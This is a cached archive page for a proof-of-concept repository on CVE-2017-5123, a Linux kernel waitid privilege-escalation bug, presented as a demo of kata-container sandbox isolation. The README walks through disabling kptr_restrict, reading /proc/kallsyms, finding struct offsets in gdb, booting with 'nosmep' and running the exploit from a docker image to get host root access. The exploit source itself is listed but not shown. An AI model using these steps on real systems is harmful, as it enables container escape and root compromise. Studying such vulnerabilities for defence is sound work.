Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-5123 PoC — Linux kernel 输入验证错误漏洞

Source
https://github.com/teawater/CVE-2017-5123
Associated Vulnerability
Title:Linux kernel 输入验证错误漏洞 (CVE-2017-5123)
Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel中存在输入验证错误漏洞。本地攻击者可利用该漏洞获取root权限。
Readme
# README

> **Note**: The code in this repo is to demo the isolation of secure pod sandbox technologies such as [kata containers](https://kata-containers.io) and does not intend to attack any platforms.

## How to re-produce
* Get linux kernel 4.13.0
* patch 0001-CVE-2017-5123-help-to-make-attack-safely.patch
* Build Linux kernel with config Kconfig
* Boot kernel and get address of dac_mmap_min_addr, have_canfork_callback, prepare_kernel_cred, commit_creds, set_fs_root, copy_fs_struct, current_task with following commands.
  Update the address to CVE-2017-5123.c
```
echo 0 > /proc/sys/kernel/kptr_restrict
cat /proc/kallsyms
```
* gdb vmlinux
* Get the size of TASK_FS_OFFSET and Update the address to CVE-2017-5123.c
```
(gdb) p &(((struct task_struct *)0)->fs)
```
* Get the size of TASK_PARENT_OFFSET and Update the address to CVE-2017-5123.c
```
(gdb) p &(((struct task_struct *)0)->parent)
```
* Get the size of FS_ROOT_OFFSET and Update the address to CVE-2017-5123.c
```
(gdb) p &(((struct fs_struct *)0)->root)
```
* build CVE-2017-5123.c with --static and put the binary file to a docker image.
* Boot kernel with kernel command line option "nosmep".
* Now, use the docker image rock and roll.

## About this CVE

The waitid implementation in upstream kernels did not restrict the target destination to copy information results. This can allow local users to write to otherwise protected kernel memory, which can lead to privilege escalation.<br>
The bug was introduced the 2017-05-21 and fixed 2017-10-09.

This CVE has already been fixed on later releases of 4.13 branch and newer mainline kernels. However, there may exist similar CVEs allows privilege escalation. The CVE itself is quite similar to famous [dirty cow, CVE-2016-5195 ](https://dirtycow.ninja/) actually.

## More Informations

CVE-2017-5123.c use this vulnerability change the value of /proc/sys/vm/mmap_min_addr.  Then let Linux kernel call shellcode to get file access permission of host root.
File Snapshot

 [4.0K]  /data/pocs/02805c4a3432b5273577a61265dd15a504c6a32d
├── [1.4K]  0001-CVE-2017-5123-help-to-make-attack-safely.patch
├── [4.9K]  CVE-2017-5123.c
├── [393K]  cve-2017-5123.key
├── [ 32K]  hacked.png
├── [ 11M]  initrd.img-4.13.0+
├── [ 85K]  Kconfig
├── [1.9K]  README.md
├── [ 60K]  systemok.png
└── [4.5M]  vmlinuz-4.13.0+

0 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.